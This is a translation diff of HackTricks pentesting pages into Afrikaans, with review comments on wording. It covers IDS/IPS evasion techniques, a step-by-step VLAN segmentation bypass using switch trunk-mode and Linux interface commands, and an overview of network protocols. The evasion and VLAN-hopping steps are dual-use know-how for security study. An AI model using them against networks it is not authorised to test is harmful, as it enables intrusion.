* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
# **TTL Manipulation**
|
||||
# **TTL-manipulasie**
|
||||
|
||||
Send some packets with a TTL enough to arrive to the IDS/IPS but not enough to arrive to the final system. And then, send another packets with the same sequences as the other ones so the IPS/IDS will think that they are repetitions and won't check them, but indeed they are carrying the malicious content.
|
||||
Stuur 'n paar pakkies met 'n TTL wat genoeg is om by die IDS/IPS aan te kom, maar nie genoeg om by die finale stelsel aan te kom nie. En stuur dan nog pakkies met dieselfde volgorde as die ander sodat die IPS/IDS dink dat dit herhalings is en dit nie sal ondersoek nie, maar in werklikheid dra hulle die skadelike inhoud.
|
||||
|
||||
**Nmap option:** `--ttlvalue <value>`
|
||||
**Nmap-opsie:** `--ttlvalue <waarde>`
|
||||
|
||||
# Avoiding signatures
|
||||
# Ontwyk handtekeninge
|
||||
|
||||
Just add garbage data to the packets so the IPS/IDS signature is avoided.
|
||||
Voeg net rommeldata by die pakkies sodat die IPS/IDS-handtekening vermy word.
|
||||
|
||||
**Nmap option:** `--data-length 25`
|
||||
**Nmap-opsie:** `--data-length 25`
|
||||
|
||||
# **Fragmented Packets**
|
||||
# **Gefragmenteerde pakkies**
|
||||
|
||||
Just fragment the packets and send them. If the IDS/IPS doesn't have the ability to reassemble them, they will arrive to the final host.
|
||||
Fragmenteer net die pakkies en stuur hulle. As die IDS/IPS nie die vermoë het om hulle weer saam te stel nie, sal hulle by die finale gasheer aankom.
|
||||
|
||||
**Nmap option:** `-f`
|
||||
**Nmap-opsie:** `-f`
|
||||
|
||||
# **Invalid** _**checksum**_
|
||||
# **Ongeldige** _**kontrolesom**_
|
||||
|
||||
Sensors usually don't calculate checksum for performance reasons. So an attacker can send a packet that will be **interpreted by the sensor but rejected by the final host.** Example:
|
||||
Sensors bereken gewoonlik nie kontrolesom vir prestasie-redes nie. 'n Aanvaller kan dus 'n pakkie stuur wat deur die sensor **geïnterpreteer word, maar deur die finale gasheer verwerp word.** Voorbeeld:
|
||||
|
||||
Send a packet with the flag RST and a invalid checksum, so then, the IPS/IDS may thing that this packet is going to close the connection, but the final host will discard the packet as the checksum is invalid.
|
||||
Stuur 'n pakkie met die vlag RST en 'n ongeldige kontrolesom, sodat die IPS/IDS dalk dink dat hierdie pakkie die verbinding gaan sluit, maar die finale gasheer sal die pakkie verwerp omdat die kontrolesom ongeldig is.
|
||||
|
||||
# **Uncommon IP and TCP options**
|
||||
# **Ongewone IP- en TCP-opsies**
|
||||
|
||||
A sensor might disregard packets with certain flags and options set within IP and TCP headers, whereas the destination host accepts the packet upon receipt.
|
||||
'N Sensor kan pakkies met sekere vlae en opsies wat in IP- en TCP-koppe ingestel is, ignoreer, terwyl die bestemmingsgasheer die pakkie aanvaar wanneer dit ontvang word.
|
||||
|
||||
# **Overlapping**
|
||||
# **Oorvleueling**
|
||||
|
||||
It is possible that when you fragment a packet, some kind of overlapping exists between packets (maybe first 8 bytes of packet 2 overlaps with last 8 bytes of packet 1, and 8 last bytes of packet 2 overlaps with first 8 bytes of packet 3). Then, if the IDS/IPS reassembles them in a different way than the final host, a different packet will be interpreted.\
|
||||
Or maybe, 2 packets with the same offset comes and the host has to decide which one it takes.
|
||||
Dit is moontlik dat wanneer jy 'n pakkie fragmenteer, daar 'n soort oorvleueling tussen pakkies bestaan (miskien oorvleuel die eerste 8 byte van pakkie 2 met die laaste 8 byte van pakkie 1, en die laaste 8 byte van pakkie 2 oorvleuel met die eerste 8 byte van pakkie 3). As die IDS/IPS hulle anders as die finale gasheer weer saamstel, sal 'n ander pakkie geïnterpreteer word.\
|
||||
Of dalk kom 2 pakkies met dieselfde verskuiwing en die gasheer moet besluit watter een dit neem.
|
||||
|
||||
* **BSD**: It has preference for packets with smaller _offset_. For packets with same offset, it will choose the first one.
|
||||
* **Linux**: Like BSD, but it prefers the last packet with the same offset.
|
||||
* **First** (Windows): First value that comes, value that stays.
|
||||
* **Last** (cisco): Last value that comes, value that stays.
|
||||
* **BSD**: Dit het voorkeur vir pakkies met 'n kleiner _verskuiwing_. Vir pakkies met dieselfde verskuiwing, sal dit die eerste een kies.
|
||||
* **Linux**: Soos BSD, maar dit verkies die laaste pakkie met dieselfde verskuiwing.
|
||||
* **Eerste** (Windows): Eerste waarde wat kom, waarde wat bly.
|
||||
* **Laaste** (cisco): Laaste waarde wat kom, waarde wat bly.
|
||||
|
||||
# Tools
|
||||
# Hulpmiddels
|
||||
|
||||
* [https://github.com/vecna/sniffjoke](https://github.com/vecna/sniffjoke)
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy wil sien dat jou **maatskappy geadverteer word in HackTricks** of **HackTricks aflaai in PDF-formaat**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslagplekke.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
|
|
|
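Review bot: the sentence under "Ongewone IP- en TCP-opsies" begins "'N Sensor kan pakkies met sekere vlae ..."; in Afrikaans the article 'n stays lowercase at the start of a sentence and the next word takes the capital, so this should read "'n Sensor kan pakkies ...". Two smaller points in the same hunk: the Nmap placeholder was translated inside the code span ("`--ttlvalue <waarde>`") even though the other two options in this file (`--data-length 25` and `-f`) were kept verbatim, so the code span should stay as `<value>`; and while that line is being touched, the option name `--ttlvalue` is carried over unchanged from the English source, whereas Nmap's option for setting the IP time-to-live is `--ttl <value>`, so both sides are worth correcting.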
@ -1,45 +1,38 @@
|
|||
# Lateral VLAN Segmentation Bypass
|
||||
# Laterale VLAN-segmentering omseil
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersecurity-maatskappy**? Wil jy jou **maatskappy geadverteer sien in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks af in PDF-formaat**? Kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFT's**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die [hacktricks repo](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
||||
If direct access to a switch is available, VLAN segmentation can be bypassed. This involves reconfiguring the connected port to trunk mode, establishing virtual interfaces for target VLANs, and setting IP addresses, either dynamically (DHCP) or statically, depending on the scenario (**for further details check [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
|
||||
As direkte toegang tot 'n skakelaar beskikbaar is, kan VLAN-segmentering omseil word. Dit behels die herkonfigurering van die gekoppelde poort na stammodus, die vestiging van virtuele interfaces vir teikenvlans, en die instelling van IP-adresse, óf dinamies (DHCP) óf staties, afhangende van die scenario (**vir verdere besonderhede, sien [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)).**
|
||||
|
||||
Initially, identification of the specific connected port is required. This can typically be accomplished through CDP messages, or by searching for the port via the **include** mask.
|
||||
|
||||
**If CDP is not operational, port identification can be attempted by searching for the MAC address**:
|
||||
Aanvanklik is identifikasie van die spesifieke gekoppelde poort vereis. Dit kan tipies bereik word deur CDP-boodskappe, of deur te soek na die poort via die **include**-masker.
|
||||
|
||||
**As CDP nie operasioneel is nie, kan poortidentifikasie probeer word deur te soek na die MAC-adres**:
|
||||
```
|
||||
SW1(config)# show mac address-table | include 0050.0000.0500
|
||||
```
|
||||
|
||||
Prior to switching to trunk mode, a list of existing VLANs should be compiled, and their identifiers determined. These identifiers are then assigned to the interface, enabling access to various VLANs through the trunk. The port in use, for instance, is associated with VLAN 10.
|
||||
|
||||
Voor die oorskakeling na stammodus, moet 'n lys van bestaande VLAN's saamgestel word en hul identifiseerders bepaal word. Hierdie identifiseerders word dan toegewys aan die koppelvlak, wat toegang tot verskillende VLAN's deur die stam moontlik maak. Die gebruikte poort is byvoorbeeld geassosieer met VLAN 10.
|
||||
```
|
||||
SW1# show vlan brief
|
||||
```
|
||||
|
||||
**Transitioning to trunk mode entails entering interface configuration mode**:
|
||||
|
||||
**Oorgang na stammodus behels die ingang van die inteface-konfigurasie-modus**:
|
||||
```
|
||||
SW1(config)# interface GigabitEthernet 0/2
|
||||
SW1(config-if)# switchport trunk encapsulation dot1q
|
||||
SW1(config-if)# switchport mode trunk
|
||||
```
|
||||
Oorskakeling na stammodus sal tydelik konnektiwiteit onderbreek, maar dit kan later herstel word.
|
||||
|
||||
Switching to trunk mode will temporarily disrupt connectivity, but this can be restored subsequently.
|
||||
|
||||
Virtual interfaces are then created, assigned VLAN IDs, and activated:
|
||||
|
||||
Virtuele interfaces word dan geskep, VLAN-ID's toegewys en geaktiveer:
|
||||
```bash
|
||||
sudo vconfig add eth0 10
|
||||
sudo vconfig add eth0 20
|
||||
|
@ -50,38 +43,33 @@ sudo ifconfig eth0.20 up
|
|||
sudo ifconfig eth0.50 up
|
||||
sudo ifconfig eth0.60 up
|
||||
```
|
||||
|
||||
Subsequently, an address request is made via DHCP. Alternatively, in cases where DHCP is not viable, addresses can be manually configured:
|
||||
|
||||
Daarna word 'n adresversoek gedoen deur middel van DHCP. Alternatiewelik, in gevalle waar DHCP nie haalbaar is nie, kan adresse handmatig gekonfigureer word:
|
||||
```bash
|
||||
sudo dhclient -v eth0.10
|
||||
sudo dhclient -v eth0.20
|
||||
sudo dhclient -v eth0.50
|
||||
sudo dhclient -v eth0.60
|
||||
```
|
||||
|
||||
Example for manually setting a static IP address on an interface (VLAN 10):
|
||||
|
||||
Voorbeeld vir die handmatige instelling van 'n statiese IP-adres op 'n koppelvlak (VLAN 10):
|
||||
```bash
|
||||
sudo ifconfig eth0.10 10.10.10.66 netmask 255.255.255.0
|
||||
```
|
||||
Konnektiwiteit word getoets deur ICMP-versoeke na die verstekroetes vir VLANs 10, 20, 50 en 60 te begin.
|
||||
|
||||
Connectivity is tested by initiating ICMP requests to the default gateways for VLANs 10, 20, 50, and 60.
|
||||
Uiteindelik maak hierdie proses dit moontlik om VLAN-segmentering te omseil, wat onbeperkte toegang tot enige VLAN-netwerk fasiliteer, en stel die verhoog vir daaropvolgende aksies.
|
||||
|
||||
Ultimately, this process enables bypassing of VLAN segmentation, thereby facilitating unrestricted access to any VLAN network, and setting the stage for subsequent actions.
|
||||
|
||||
## References
|
||||
## Verwysings
|
||||
|
||||
* [https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9](https://medium.com/@in9uz/cisco-nightmare-pentesting-cisco-networks-like-a-devil-f4032eb437b9)
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
* Do you work in a **cybersecurity company**? Do you want to see your **company advertised in HackTricks**? or do you want to have access to the **latest version of the PEASS or download HackTricks in PDF**? Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* **Join the** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** me on **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the [hacktricks repo](https://github.com/carlospolop/hacktricks) and [hacktricks-cloud repo](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
* Werk jy in 'n **cybersekuriteitsmaatskappy**? Wil jy jou **maatskappy adverteer in HackTricks**? Of wil jy toegang hê tot die **nuutste weergawe van die PEASS of laai HackTricks in PDF af**? Kyk na die [**SUBSKRIPSIEPLANNE**](https://github.com/sponsors/carlospolop)!
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* Kry die [**amptelike PEASS & HackTricks-uitrusting**](https://peass.creator-spring.com)
|
||||
* **Sluit aan by die** [**💬**](https://emojipedia.org/speech-balloon/) [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** my op **Twitter** 🐦[**@carlospolopm**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou haktruuks deur PR's in te dien by die [hacktricks-opslag](https://github.com/carlospolop/hacktricks) en [hacktricks-cloud-opslag](https://github.com/carlospolop/hacktricks-cloud)**.
|
||||
|
||||
</details>
|
||||
|
|
|
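Review bot: "inteface-konfigurasie-modus" in "**Oorgang na stammodus behels die ingang van die inteface-konfigurasie-modus**" has a typo ("inteface") and mixes the English "interface" with the Afrikaans "koppelvlak" used a few lines later ("op 'n koppelvlak (VLAN 10)"); "koppelvlak-konfigurasiemodus" keeps the term consistent. Likewise "teikenvlans" in the opening paragraph should follow the "VLAN's" spelling used in the rest of the file ("teiken-VLAN's"). The two copies of the footer in this file are also translated differently: the top one keeps "SUBSCRIPTION PLANS" and says "hacking-truuks", the bottom one has "SUBSKRIPSIEPLANNE" and "haktruuks". Since this footer is repeated in every file of the commit, both copies should be identical and match the wording used in the other files.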
@ -1,78 +1,72 @@
|
|||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Kry die [**amptelike PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Ontdek [**The PEASS Family**](https://opensea.io/collection/the-peass-family), ons versameling eksklusiewe [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Sluit aan by die** 💬 [**Discord-groep**](https://discord.gg/hRep4RUj7f) of die [**telegram-groep**](https://t.me/peass) of **volg** ons op **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Deel jou hacking-truuks deur PR's in te dien by die** [**HackTricks**](https://github.com/carlospolop/hacktricks) en [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) GitHub-opslag.
|
||||
|
||||
</details>
|
||||
|
||||
|
||||
## Multicast DNS (mDNS)
|
||||
|
||||
The **mDNS** protocol is designed for IP address resolution within small, local networks without a dedicated name server. It operates by multicasting a query within the subnet, prompting the host with the specified name to respond with its IP address. All devices in the subnet can then update their mDNS caches with this information.
|
||||
Die **mDNS**-protokol is ontwerp vir IP-adresoplossing binne klein, plaaslike netwerke sonder 'n toegewyde naambediener. Dit werk deur 'n navraag binne die subnet uit te stuur, wat die gasheer met die gespesifiseerde naam aanmoedig om met sy IP-adres te reageer. Alle toestelle in die subnet kan dan hul mDNS-cache met hierdie inligting opdateer.
|
||||
|
||||
Key points to note:
|
||||
- **Domain Name Relinquishment**: A host can release its domain name by sending a packet with a TTL of zero.
|
||||
- **Usage Restriction**: mDNS typically resolves names ending in **.local** only. Conflicts with non-mDNS hosts in this domain require network configuration adjustments.
|
||||
- **Networking Details**:
|
||||
- Ethernet multicast MAC addresses: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
|
||||
- IP addresses: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
|
||||
- Operates over UDP port 5353.
|
||||
- mDNS queries are confined to the local network and do not cross routers.
|
||||
Belangrike punte om op te let:
|
||||
- **Domeinnaamverlating**: 'n Gasheer kan sy domeinnaam vrylaat deur 'n pakkie met 'n TTL van nul te stuur.
|
||||
- **Gebruiksbeperking**: mDNS los gewoonlik slegs name op wat eindig op **.local**. Konflikte met nie-mDNS-gasheerders in hierdie domein vereis netwerkkonfigurasie-aanpassings.
|
||||
- **Netwerkdetails**:
|
||||
- Ethernet-multicast-MAC-adresse: IPv4 - `01:00:5E:00:00:FB`, IPv6 - `33:33:00:00:00:FB`.
|
||||
- IP-adresse: IPv4 - `224.0.0.251`, IPv6 - `ff02::fb`.
|
||||
- Werk oor UDP-poort 5353.
|
||||
- mDNS-navrae is beperk tot die plaaslike netwerk en steek nie roetings nie.
|
||||
|
||||
## DNS-SD (Service Discovery)
|
||||
## DNS-SD (Diensontdekking)
|
||||
|
||||
DNS-SD is a protocol for discovering services on a network by querying specific domain names (e.g., `_printers._tcp.local`). A response includes all related domains, such as available printers in this case. A comprehensive list of service types can be found [here](http://www.dns-sd.org/ServiceTypes.html).
|
||||
DNS-SD is 'n protokol vir die ontdekking van dienste op 'n netwerk deur spesifieke domeinname te ondervra (bv. `_printers._tcp.local`). 'n Antwoord sluit alle verwante domeine in, soos beskikbare drukkers in hierdie geval. 'n Omvattende lys van dienssoorte kan [hier](http://www.dns-sd.org/ServiceTypes.html) gevind word.
|
||||
|
||||
## SSDP (Simple Service Discovery Protocol)
|
||||
## SSDP (Eenvoudige Diensontdekkingsprotokol)
|
||||
|
||||
SSDP facilitates the discovery of network services and is primarily utilized by UPnP. It's a text-based protocol using UDP over port 1900, with multicast addressing. For IPv4, the designated multicast address is `239.255.255.250`. SSDP's foundation is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), an extension of HTTP for UDP.
|
||||
SSDP fasiliteer die ontdekking van netwerkdienste en word hoofsaaklik deur UPnP gebruik. Dit is 'n teksgebaseerde protokol wat UDP oor poort 1900 gebruik, met multicast-adressering. Vir IPv4 is die aangewese multicast-adres `239.255.255.250`. SSDP se grondslag is [HTTPU](https://en.wikipedia.org/wiki/HTTPU), 'n uitbreiding van HTTP vir UDP.
|
||||
|
||||
|
||||
## Web Service for Devices (WSD)
|
||||
Devices connected to a network can identify available services, like printers, through the Web Service for Devices (WSD). This involves broadcasting UDP packets. Devices seeking services send requests, while service providers announce their offerings.
|
||||
## Webdiens vir Toestelle (WSD)
|
||||
Toestelle wat aan 'n netwerk gekoppel is, kan beskikbare dienste, soos drukkers, identifiseer deur middel van die Webdiens vir Toestelle (WSD). Dit behels die uitsaai van UDP-pakkies. Toestelle wat dienste soek, stuur versoek, terwyl diensverskaffers hul aanbiedinge aankondig.
|
||||
|
||||
## OAuth 2.0
|
||||
OAuth 2.0 is a protocol facilitating secure, selective sharing of user information between services. For instance, it enables services to access user data from Google without multiple logins. The process involves user authentication, authorization by the user, and token generation by Google, allowing service access to the specified user data.
|
||||
OAuth 2.0 is 'n protokol wat die veilige, selektiewe deling van gebruikersinligting tussen dienste fasiliteer. Dit maak dit byvoorbeeld moontlik vir dienste om toegang tot gebruikersdata van Google te verkry sonder veelvuldige aanmeldings. Die proses behels gebruikersverifikasie, magtiging deur die gebruiker, en token-generering deur Google, wat diens toegang tot die gespesifiseerde gebruikersdata moontlik maak.
|
||||
|
||||
## RADIUS
|
||||
RADIUS (Remote Authentication Dial-In User Service) is a network access protocol primarily used by ISPs. It supports authentication, authorization, and accounting. User credentials are verified by a RADIUS server, potentially including network address verification for added security. Post-authentication, users receive network access and their session details are tracked for billing and statistical purposes.
|
||||
RADIUS (Remote Authentication Dial-In User Service) is 'n netwerktoegangsprotokol wat hoofsaaklik deur internetdiensverskaffers gebruik word. Dit ondersteun verifikasie, magtiging en boekhouding. Gebruikerslegitimasie word geverifieer deur 'n RADIUS-bedieners, wat moontlik netwerkadresverifikasie vir bygevoegde sekuriteit kan insluit. Na verifikasie ontvang gebruikers netwerktoegang en word hul sessiebesonderhede vir fakturerings- en statistiese doeleindes gevolg.
|
||||
|
||||
## SMB and NetBIOS
|
||||
## SMB en NetBIOS
|
||||
|
||||
### SMB (Server Message Block)
|
||||
SMB is a protocol for sharing files, printers, and ports. It operates directly over TCP (port 445) or via NetBIOS over TCP (ports 137, 138). This dual compatibility enhances connectivity with various devices.
|
||||
SMB is 'n protokol vir die deel van lêers, drukkers en poorte. Dit werk direk oor TCP (poort 445) of via NetBIOS oor TCP (poorte 137, 138). Hierdie dubbele verenigbaarheid verbeter die konnektiwiteit met verskillende toestelle.
|
||||
|
||||
### NetBIOS (Network Basic Input/Output System)
|
||||
NetBIOS manages network sessions and connections for resource sharing. It supports unique names for devices and group names for multiple devices, enabling targeted or broadcast messaging. Communication can be connectionless (no acknowledgment) or connection-oriented (session-based). While NetBIOS traditionally operates over protocols like IPC/IPX, it's commonly used over TCP/IP. NetBEUI, an associated protocol, is known for its speed but was also quite verbose due to broadcasting.
|
||||
NetBIOS bestuur netwerksessies en -verbindings vir die deling van hulpbronne. Dit ondersteun unieke name vir toestelle en groepname vir meervoudige toestelle, wat geteikende of uitsaai-boodskappe moontlik maak. Kommunikasie kan verbindingsloos (sonder bevestiging) of verbindingsgeoriënteerd (sessiegebaseerd) wees. Terwyl NetBIOS tradisioneel oor protokolle soos IPC/IPX werk, word dit algemeen oor TCP/IP gebruik. NetBEUI, 'n geassosieerde protokol, staan bekend om sy spoed, maar was ook nogal omslagtig as gevolg van uitsaai.
|
||||
|
||||
## LDAP (Lightweight Directory Access Protocol)
|
||||
LDAP is a protocol enabling the management and access of directory information over TCP/IP. It supports various operations for querying and modifying directory information. Predominantly, it's utilized for accessing and maintaining distributed directory information services, allowing interaction with databases designed for LDAP communication.
|
||||
LDAP is 'n protokol wat die bestuur en toegang tot gidsinligting oor TCP/IP moontlik maak. Dit ondersteun verskeie operasies vir die ondervraging en wysiging van gidsinligting. Dit word hoofsaaklik gebruik vir die toegang en instandhouding van verspreide gidsinligtingsdienste, wat interaksie met databasisse wat ontwerp is vir LDAP-kommunikasie moontlik maak.
|
||||
|
||||
## Active Directory (AD)
|
||||
Active Directory is a network-accessible database containing objects like users, groups, privileges, and resources, facilitating centralized management of network entities. AD organizes its data into a hierarchical structure of domains, which can encompass servers, groups, and users. Subdomains allow further segmentation, each potentially maintaining its own server and user base. This structure centralizes user management, granting or restricting access to network resources. Queries can be made to retrieve specific information, like contact details, or to locate resources, like printers, within the domain.
|
||||
Active Directory is 'n netwerktoeganklike databasis wat voorwerpe soos gebruikers, groepe, voorregte en hulpbronne bevat, wat die gesentraliseerde bestuur van netwerkentiteite fasiliteer. AD organiseer sy data in 'n hiërargiese struktuur van domeine, wat bedieners, groepe en gebruikers kan insluit. Subdomeine maak verdere segmentering moontlik, waarvan elkeen moontlik sy eie bediener en gebruikersbasis handhaaf. Hierdie struktuur sentraliseer gebruikersbestuur, wat toegang tot netwerkbronne verleen of beperk. Navrae kan gedoen word om spesifieke inligting, soos kontakbesonderhede, op te haal, of om hulpbronne, soos drukkers, binne die domein te vind.
|
||||
|
||||
|
||||
<details>
|
||||
|
||||
<summary><strong>Learn AWS hacking from zero to hero with</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Other ways to support HackTricks:
|
||||
|
||||
* If you want to see your **company advertised in HackTricks** or **download HackTricks in PDF** Check the [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
* Get the [**official PEASS & HackTricks swag**](https://peass.creator-spring.com)
|
||||
* Discover [**The PEASS Family**](https://opensea.io/collection/the-peass-family), our collection of exclusive [**NFTs**](https://opensea.io/collection/the-peass-family)
|
||||
* **Join the** 💬 [**Discord group**](https://discord.gg/hRep4RUj7f) or the [**telegram group**](https://t.me/peass) or **follow** us on **Twitter** 🐦 [**@hacktricks_live**](https://twitter.com/hacktricks_live)**.**
|
||||
* **Share your hacking tricks by submitting PRs to the** [**HackTricks**](https://github.com/carlospolop/hacktricks) and [**HackTricks Cloud**](https://github.com/carlospolop/hacktricks-cloud) github repos.
|
||||
|
||||
</details>
|
||||
<summary><strong>Leer AWS-hacking van nul tot held met</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
|
||||
|
||||
Ander maniere om HackTricks te ondersteun:
|
||||
|
||||
* As jy jou **maatskappy geadverteer wil sien in HackTricks** of **HackTricks in PDF wil aflaai**, kyk na die [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)!
|
||||
